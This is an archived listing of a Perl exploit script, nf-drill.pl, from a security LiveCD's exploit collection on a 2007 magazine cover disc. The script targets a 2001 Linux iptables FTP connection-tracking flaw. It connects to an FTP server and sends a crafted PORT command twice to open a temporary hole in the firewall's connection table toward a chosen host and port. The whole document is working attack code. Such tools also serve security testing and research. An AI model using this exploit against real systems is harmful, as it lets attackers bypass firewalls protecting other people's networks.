home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / firewall / iptables / nf-drill.pl < prev   
Perl Script  |  2005-02-12  |  3KB  |  93 lines
  1. #!/usr/bin/perl
  2. #
  3. # nf-drill.pl --- "Drill" holes open in Linux iptables connection table
  4. # Author: Cristiano Lincoln Mattos <lincoln@cesar.org.br>, 2001
  6. # Advisory: http://www.tempest.com.br/advisories/linux-iptables
  8. #      Tempest Security Technologies - a business unit of:
  9. #    CESAR - Centro de Estudos e Sistemas Avancados do Recife
  10. #
  11. # This code is licensed under the GPL.
  12. #
  13.  
  14. use Socket;
  15. use Getopt::Long;
  16. use strict;
  17.  
  18. # Option variables
  19. my $server;
  20. my $serverport = 21;
  21. my $host;
  22. my $port;
  23. my $verbose = 0;
  24.  
  25. # Print function
  26. sub out {
  27.     my ($level,$text) = @_;
  28.     if (!$level || ($level && $verbose)) { print "$text"; }
  29. }
  30.  
  31. my $opt = GetOptions("server=s" => \$server,
  32.              "serverport=s" => \$serverport,
  33.              "host=s" => \$host,
  34.              "port=i" => \$port,
  35.              "verbose" => \$verbose);
  36.  
  37. if ($server eq "" || $host eq "" || $port eq "" || $port < 0 || $port > 65535) {
  38.     print "Usage: $0 --server <ftp> [--serverport <port>] --host <target> --port <port> [--verbose]\n";
  39.     print "   - server: specifies the FTP server (IP or hostname) to connect to\n";
  40.     print "   - serverport: specifies the port of the FTP server -- default: 21\n";
  41.     print "   - host: the IP of the target to open in the connection table\n";
  42.     print "   - port: the port of the target to open in the connection table\n";
  43.     print "   - verbose: sets verbose mode\n";
  44.     exit(0);
  45. }
  46.  
  47. print "\n nf-blast.pl -- Cristiano Lincoln Mattos <lincoln\@cesar.org.br>, 2001\n";
  48. print " Tempest Security Technologies\n\n";
  49.  
  50. # For the meanwhile, expecting an IP
  51. my @ip = split(/\./,$host);
  52. my $str = "PORT " . $ip[0] . "," . $ip[1] . "," . $ip[2] . "," . $ip[3] . "," . ($port >> 8) . "," . ($port % 256) . "\r\n";
  53.  
  54. # Socket init
  55. my $ipn = inet_aton($server);
  56. if (!$ipn) {
  57.     out(0," Error: could not convert $server\n");
  58.     exit(0);
  59. }
  60.  
  61. my $sin = sockaddr_in($serverport,$ipn);
  62. socket(Sock,PF_INET,SOCK_STREAM,6);
  63.  
  64. if (!connect(Sock,$sin)) {
  65.     out(0," Error: could not connect to $server:$serverport.\n");
  66.     exit(0);
  67. }
  68. out(0," - Connected to $server:$serverport\n");
  69.  
  70. my $buf;
  71. recv(Sock,$buf,120,0); chomp($buf);
  72. out(1," - RECV: $buf\n");
  73.  
  74. # First send a dummy one, just to establish the connection in the iptables logic
  75. send(Sock,$str,0);
  76. out(1," - SEND: $str");
  77. recv(Sock,$buf,120,0); chomp($buf);
  78. out(1," - RECV: $buf\n");
  79.  
  80. # Now, send the one that will insert itself into the connection table
  81. send(Sock,$str,0);
  82. out(1," - SEND: $str");
  83. recv(Sock,$buf,120,0); chomp($buf);
  84. out(1," - RECV: $buf\n");
  85.  
  86. out(0," * $server should now be able to connect to $host on port $port ! (for the next 10 seconds)\n");
  87. out(0," - Closing connection to $server:$serverport.\n\n");
  88. close(Sock);
  89.  
  90.  
  91.  
  92.  
  93.